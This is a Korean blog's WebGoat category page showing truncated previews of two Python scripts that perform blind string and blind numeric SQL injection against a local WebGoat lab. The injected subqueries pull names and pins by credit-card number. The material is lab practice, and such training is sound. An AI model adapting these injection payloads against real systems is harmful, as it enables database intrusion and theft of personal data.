JWS

  • 홈
  • 태그
  • 방명록

Python/Webgoat 2

Blind string injection

import requests url='http://localhost:8080/WebGoat/attack?Screen=1315528047&menu=1100' cookie={'JSESSIONID' : '2C39E081510CA8F799595014F02D79A7'} #접속할 때마다 달라짐. words="101 and length(select name from pins where cc_number='4321432143214321') >" for i in range(0, 10): data= {'account_number': words + str(i), 'SUMBIT':'GO!'} res=requests.post(url, data=data, cookies=cookie) if 'Account number is val..

Python/Webgoat 2021.09.02

Blind numeric sql injection

import requests url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100' headers={'Content-Type' : 'application/x-www-form-urlencoded;'} cookie = {'JSESSIONID' : '758026477EFE927534DDA6CCB9F2058A'} words= "101 and (select pin from pins where cc_number = '1111222233334444') >" for k in range(1,10): data={'account_number' : words + str(10**k), 'SUBMIT': 'GO!'} res=requests.post(url,..

Python/Webgoat 2021.09.02
이전
1
다음
더보기
프로필사진

  • 분류 전체보기 (82)
    • AWS (26)
    • Kubernetes (12)
    • Docker (2)
    • IaC (3)
    • CICD (3)
    • Python (23)
      • Programmers (14)
      • Django (2)
      • Webgoat (2)
    • Network (4)
    • 자격증 (5)
    • IT (3)
    • 잡동사니 (1)
    • 취준길 (0)
    • Memory (0)

방문자수Total

  • Today :
  • Yesterday :

Copyright © Kakao Corp. All rights reserved.

티스토리툴바